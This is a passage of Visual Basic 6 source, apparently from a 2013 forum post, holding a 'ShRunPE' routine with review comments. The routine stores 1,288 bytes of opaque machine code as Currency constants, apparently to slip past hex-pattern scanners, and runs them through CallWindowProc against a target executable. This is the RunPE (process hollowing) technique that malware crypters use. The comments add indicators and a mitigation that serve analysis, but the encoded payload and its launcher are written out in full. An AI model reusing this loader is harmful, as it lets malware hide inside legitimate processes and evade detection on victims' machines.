    ' Returns:    nothing useful. No return type is declared and ShRunPE is never
    '             assigned, so callers always receive Empty and cannot see failures.
    '
    ' NOTE(review): the machine code is opaque and was not reviewed here. "RunPE"
    ' is the common name for process hollowing (MITRE ATT&CK T1055.012); whether
    ' this blob does exactly that should be confirmed in a disassembler inside an
    ' isolated analysis environment.
    '
    ' Analyst notes:
    ' - Encoding: Currency is an 8-byte type, so the 161 elements below form a
    '   1288-byte buffer. The bytes never appear as hex or Byte literals in the
    '   source, so a hex-pattern search over the source will not match them;
    '   presumably that is the reason for this encoding.
    ' - Static indicator: a large table of Currency constants whose VarPtr() is
    '   passed as the first argument of CallWindowProc, in a module that creates
    '   or subclasses no window.
    ' - Runtime indicator: a thread executing from a non-image memory region with
    '   USER32!CallWindowProcW on the call stack.
    ' - Mitigation: the array is ordinary data memory, so this presumably only
    '   works where DEP/NX is not enforced for the process - verify.
    Dim Asm(160) As Currency
    Asm(0) = 3011782251321.1488@
    Asm(1) = 2842944510165.0021@
    Asm(2) = 21475170.7244@
    Asm(3) = 3039972698908.2734@
    Asm(4) = 0.0108@
    Asm(5) = 0@
    Asm(6) = 0@
    Asm(7) = 0@
    Asm(8) = 0@
    Asm(9) = 0@
    Asm(10) = 770918988510973.1328@
    Asm(11) = 609196292101137.4146@
    Asm(12) = 318076019310180.1508@
    Asm(13) = -857485367476117.5446@
    Asm(14) = 399392180.8913@
    Asm(15) = -706833318868351.5511@
    Asm(16) = 6879439133396.1731@
    Asm(17) = 763810498335316.3776@
    Asm(18) = 388654513.6166@
    Asm(19) = 98506041997.169@
    Asm(20) = 24964196938431.9488@
    Asm(21) = 22034984796.16@
    Asm(22) = 305625529718164.0704@
    Asm(23) = -410459675325501.5192@
    Asm(24) = -172419915909691.6991@
    Asm(25) = 150655457759015.8157@
    Asm(26) = 763810498295053.1535@
    Asm(27) = -334758189796557.4082@
    Asm(28) = 763810498175933.6042@
    Asm(29) = 769693235337619.0272@
    Asm(30) = 658651445508203.5218@
    Asm(31) = 93228415366.4744@
    Asm(32) = 337544363.4688@
    Asm(33) = -171181400105556.1333@
    Asm(34) = -43143787013419.7499@
    Asm(35) = -843073848963811.6758@
    Asm(36) = 586115344006226.9449@
    Asm(37) = 81903309047.8335@
    Asm(38) = -170655782147139.7888@
    Asm(39) = -296106572219468.926@
    Asm(40) = -171744351251070.9758@
    Asm(41) = 478565684273270.0365@
    Asm(42) = 766128157362243.3@
    Asm(43) = 763822153521118.6688@
    Asm(44) = -5798494293561.088@
    Asm(45) = 292876624.968@
    Asm(46) = -303308424893800.028@
    Asm(47) = 18687314406408.1922@
    Asm(48) = -814921249263117.9264@
    Asm(49) = 377936345376908.9026@
    Asm(50) = 914455950214871.0911@
    Asm(51) = 793381819255881.7282@
    Asm(52) = 247979454486563.4385@
    Asm(53) = -842580059571706.7544@
    Asm(54) = 261953043.9225@
    Asm(55) = 1351124663940.1355@
    Asm(56) = -5728895679889.4336@
    Asm(57) = 16435523184027.2177@
    Asm(58) = 453291086712582.9632@
    Asm(59) = -171181401297649.6638@
    Asm(60) = 247984901789109.5093@
    Asm(61) = 763853927511347.5304@
    Asm(62) = 68764336814004.0238@
    Asm(63) = 377880083361326.677@
    Asm(64) = 58153857883.8015@
    Asm(65) = -170634502550313.984@
    Asm(66) = -6846382739763.962@
    Asm(67) = 217285200.5584@
    Asm(68) = 273152312385105.8024@
    Asm(69) = 13733354816300.6466@
    Asm(70) = 764000768607145.1648@
    Asm(71) = 17395153563837.4458@
    Asm(72) = -353751767489869.7902@
    Asm(73) = 763363.3281@
    Asm(74) = 392094642558210.6624@
    Asm(75) = 764766522162398.7432@
    Asm(76) = 126410412043612.3678@
    Asm(77) = 27351427555.8027@
    Asm(78) = 11706747011255.5776@
    Asm(79) = -757276053642969.088@
    Asm(80) = 360268856045024.0513@
    Asm(81) = 749398978656993.7514@
    Asm(82) = 12354147786351.6251@
    Asm(83) = 769693219347778.7648@
    Asm(84) = 414640788194904.6822@
    Asm(85) = -171181417231738.2261@
    Asm(86) = 276807880992725.4373@
    Asm(87) = -842805239553082.2424@
    Asm(88) = 37043291672.0721@
    Asm(89) = 507392545273423.744@
    Asm(90) = 769258247064186.1864@
    Asm(91) = 68764336812483.5886@
    Asm(92) = 360268875651665.0832@
    Asm(93) = 749398978495932.017@
    Asm(94) = 9651988025294.3009@
    Asm(95) = 769693219347778.7648@
    Asm(96) = 126410412042563.7942@
    Asm(97) = -171294008471547.0205@
    Asm(98) = -387449256181707.5451@
    Asm(99) = 363299752439103.6175@
    Asm(100) = -410459675325517.2888@
    Asm(101) = -172926570866094.7199@
    Asm(102) = -635688100489173.3787@
    Asm(103) = 763810497261576.6376@
    Asm(104) = 126410412042144.3634@
    Asm(105) = -843073849903335.4646@
    Asm(106) = 769693215773368.7817@
    Asm(107) = 414640788193698.8194@
    Asm(108) = 4951342415221.7475@
    Asm(109) = 4636260512845.0048@
    Asm(110) = -171631782205882.368@
    Asm(111) = 507388721888441.1549@
    Asm(112) = 31815578412492.9256@
    Asm(113) = -872572382190820.8041@
    Asm(114) = -286501654647065.8048@
    Asm(115) = -428658242031485.5343@
    Asm(116) = 3149895693349.6588@
    Asm(117) = 22752143878461.8496@
    Asm(118) = 10655039450.0177@
    Asm(119) = 19434514006.2976@
    Asm(120) = 2249161163731.9936@
    Asm(121) = 590215178835617.3824@
    Asm(122) = -171519195984216.1688@
    Asm(123) = 334471606820667.3981@
    Asm(124) = -6937148713125.7624@
    Asm(125) = 3006614124114.7186@
    Asm(126) = 457802337043140.7336@
    Asm(127) = 34749504.673@
    Asm(128) = -843073850212036.239@
    Asm(129) = 536232810004781.4409@
    Asm(130) = 699902812802672.356@
    Asm(131) = -439434742750697.5805@
    Asm(132) = 756604737376275.6714@
    Asm(133) = 869968633553.1604@
    Asm(134) = 450404738465.792@
    Asm(135) = -7194094211452.1344@
    Asm(136) = -1353710065018.4752@
    Asm(137) = -439079356974065.2545@
    Asm(138) = 566676858034822.4232@
    Asm(139) = 32602016.4622@
    Asm(140) = -7089160921751.4365@
    Asm(141) = 410061545662244.4496@
    Asm(142) = 617979275378688@
    Asm(143) = 725985904952471.1762@
    Asm(144) = 854193482151915.9435@
    Asm(145) = -842159216757581.13@
    Asm(146) = 457592490565246.7766@
    Asm(147) = 17684902147728.7019@
    Asm(148) = 643884385768544.0491@
    Asm(149) = 622040492439682.185@
    Asm(150) = 842553683379673.7879@
    Asm(151) = 865826324060815.6483@
    Asm(152) = 233132869356380.6979@
    Asm(153) = -841594865717950.1309@
    Asm(154) = -598169487549740.1085@
    Asm(155) = 22006038477175.2068@
    Asm(156) = 843978581769276.108@
    Asm(157) = -840178504924852.7391@
    Asm(158) = -836852911227146.7764@
    Asm(159) = 643884385767650.3812@
    Asm(160) = 328436.0538@
    ' The address of the first array element goes where CallWindowProc expects a
    ' window procedure, so USER32 transfers control into the array. No window is
    ' involved; the API is used only as a way to call an arbitrary address from VB6.
    CallWindowProc VarPtr(Asm(0)), StrPtr(TargetHost), VarPtr(bBuffer(0)), 0, 0
    End Function
    --- добавлено: 23 дек 2013 в 14:16 ---
     